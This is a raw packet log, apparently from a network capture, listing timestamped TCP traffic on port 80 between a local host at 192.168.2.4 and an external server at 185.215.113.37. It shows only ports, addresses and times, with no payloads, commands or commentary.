Oct 13, 2024 17:46:19.050664902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050676107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050679922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050679922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050679922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050697088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050714016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050724983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050734997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050745964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050748110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050748110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050748110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050756931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050769091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050784111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050795078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050828934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050838947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050838947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050838947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050839901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050839901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050849915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050860882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050872087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050883055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050893068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050904036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050920963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050924063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050924063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050924063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050937891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050951958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050955057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050961971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050981045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050991058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.050997019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.050997972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.051002979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.051017046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.051028013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.051038027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.051043034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.051043034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.051050901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.051239967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.051239967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.051239967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.138905048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.138922930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.138933897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.138973951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.138999939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.139008045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139020920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139033079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139044046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139055014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139065981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139071941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.139080048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139084101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.139092922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139121056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.139137983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.139178991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139190912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139202118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139210939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.139240980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139254093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139265060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139266968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.139277935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139286041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.139292002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139303923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139338017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.139395952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.139652014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139663935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139674902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139686108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139698029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139714956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139724016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.139724016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.139731884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139745951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139763117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139766932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.139796972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139802933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.139802933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.139810085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139856100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.139856100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.139862061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139875889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139887094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.139902115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.139951944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.140165091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140177965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140188932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140239000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.140239000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.140307903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140333891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140345097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140356064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140356064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.140368938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140378952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.140382051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140393972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140404940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140409946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.140418053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140430927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.140430927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140475035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.140475035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.140594006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140604973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140616894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140628099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140636921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.140639067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140657902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140670061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140680075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140686035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.140686035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.140692949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140706062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140717030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140719891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.140719891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.140727043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140738010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140749931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.140753031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140765905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140782118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.140821934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.140821934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.140856028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140867949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140878916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140889883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140899897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.140902996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140928030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.140950918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140969038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140980959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140991926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.140995026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.140995026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141011953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141026020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141028881 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141028881 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141045094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141056061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141056061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141069889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141081095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141081095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141093969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141105890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141117096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141124010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141124010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141128063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141143084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141171932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141227007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141228914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141238928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141258955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141275883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141288042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141290903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141290903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141299009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141311884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141323090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141329050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141336918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141346931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141347885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141369104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141376972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141376972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141382933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141396046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141407967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141433954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141446114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141457081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141468048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141473055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141473055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141552925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141645908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141659021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141669989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141680956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141715050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141716003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141769886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141782999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141793966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141804934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141817093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141828060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141830921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141830921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141839981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141850948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141860008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141863108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141875029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.141892910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141892910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.141932964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.229243994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.229259014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.229279995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.229299068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.229310989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.229317904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.229324102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.229336023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.229345083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.229348898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.229456902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.229458094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.229466915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.229485035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.229495049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.229528904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.229528904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.229554892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.229566097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.229577065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.229588032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.229599953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.229599953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.229686022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.230458021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.230504990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.230505943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.230519056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.230561972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.230561972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.230561972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.230575085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.230586052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.230621099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.230621099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.230776072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.230793953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.230804920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.230815887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.230824947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.230827093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.230839014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.230839968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.230853081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.230864048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.230875969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.230885983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.230895042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.230895042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.230896950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.230916023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.230926037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.230931997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.230931997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.230937958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.230951071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.230952978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.230967045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.230978966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.230979919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.230990887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231002092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231012106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231023073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231025934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.231034994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231036901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.231050014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231060982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231070995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231077909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.231077909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.231106043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.231118917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231132030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231142044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231152058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231163979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231172085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.231174946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231187105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231195927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231213093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.231213093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.231214046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231225014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231234074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.231237888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231250048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231261015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231291056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.231291056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.231307983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231318951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231336117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231345892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231345892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.231345892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.231358051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231362104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:19.231369019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:19.231393099 CEST	80	49730	185.215.113.37	192.168.2.4
